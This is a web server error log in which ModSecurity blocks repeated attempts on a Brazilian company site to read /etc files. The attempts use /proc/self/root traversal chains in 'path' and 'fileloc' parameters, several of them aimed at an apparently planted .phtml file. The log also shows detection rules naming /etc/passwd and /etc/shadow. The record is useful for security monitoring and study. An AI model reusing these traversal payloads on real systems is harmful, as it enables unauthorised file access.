https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:52.568139 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:43554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FgOoXxyEfFpUF8f9jywAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:53.814900 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:43564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FgfqxLDW4GITHUkTE6wAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:54.951299 2026] [:error] [pid 11167:tid 140411708356352] [client 57.141.18.109:52506] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FgvHIg5MgXLBnicPbvAAAAcQ"]
[Fri Mar 20 05:29:55.026773 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.75:52510] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FgwF0L0L-SsrnPo5KFAAAAsc"]
[Fri Mar 20 05:29:56.173981 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:43572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FhBCii7xarUs8iHZJKAAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:57.735005 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:57464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FhTJ3M9BSuKP7CAb1QgAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:59.035060 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:57470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fh_qxLDW4GITHUkTE8gAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:00.323163 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.69:52938] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FiOoXxyEfFpUF8f9jzgAAAU0"]
[Fri Mar 20 05:30:01.806558 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:53040] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:30:02.578841 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.47:53056] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FivqxLDW4GITHUkTE-AAAAQs"]
[Fri Mar 20 05:30:17.895424 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.56:53912] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FmeoXxyEfFpUF8f9j2gAAAU4"]
[Fri Mar 20 05:30:18.134763 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.8:53932] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fmrninkcc-iUj5ApA4AAAA4s"]
[Fri Mar 20 05:30:18.388429 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:56206] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/var
[Fri Mar 20 05:30:18.774275 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.124:53970] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fml1pVZ5mVmJwsFMRrwAAAFI"]
[Fri Mar 20 05:30:20.051738 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:57480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FnBCii7xarUs8iHZJSwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:20.526325 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.23:54088] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FnBCii7xarUs8iHZJTwAAAhY"]
[Fri Mar 20 05:30:22.220088 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:57480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FnhCii7xarUs8iHZJVgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:22.857926 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.78:54216] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FngF0L0L-SsrnPo5KKAAAAtQ"]
[Fri Mar 20 05:30:23.323407 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.60:54240] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fn-oXxyEfFpUF8f9j6AAAAUw"]
[Fri Mar 20 05:30:23.730865 2026] [:error] [pid 15826:tid 140411624429312] [client 216.73.216.191:43056] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fn-oXxyEfFpUF8f9j6gAAAU4"]
[Fri Mar 20 05:30:25.915479 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:40528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FofqxLDW4GITHUkTFEgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:27.318888 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.241.31:55760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fo7ninkcc-iUj5ApA6QAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:27.955966 2026] [mime_magic:error] [pid 11642:tid 140411632822016] (70014)End of file found: [client 57.141.18.37:54408] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:30:28.637187 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:55776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FpBCii7xarUs8iHZJXQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:32.135776 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:55790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FqAF0L0L-SsrnPo5KNgAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:30:32.497047 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.39:54566] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FqAF0L0L-SsrnPo5KOgAAAsg"]
[Fri Mar 20 05:30:32.927296 2026] [:error] [pid 11642:tid 140411641214720] [client 57.141.18.113:54582] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FqLninkcc-iUj5ApA7gAAA4w"]
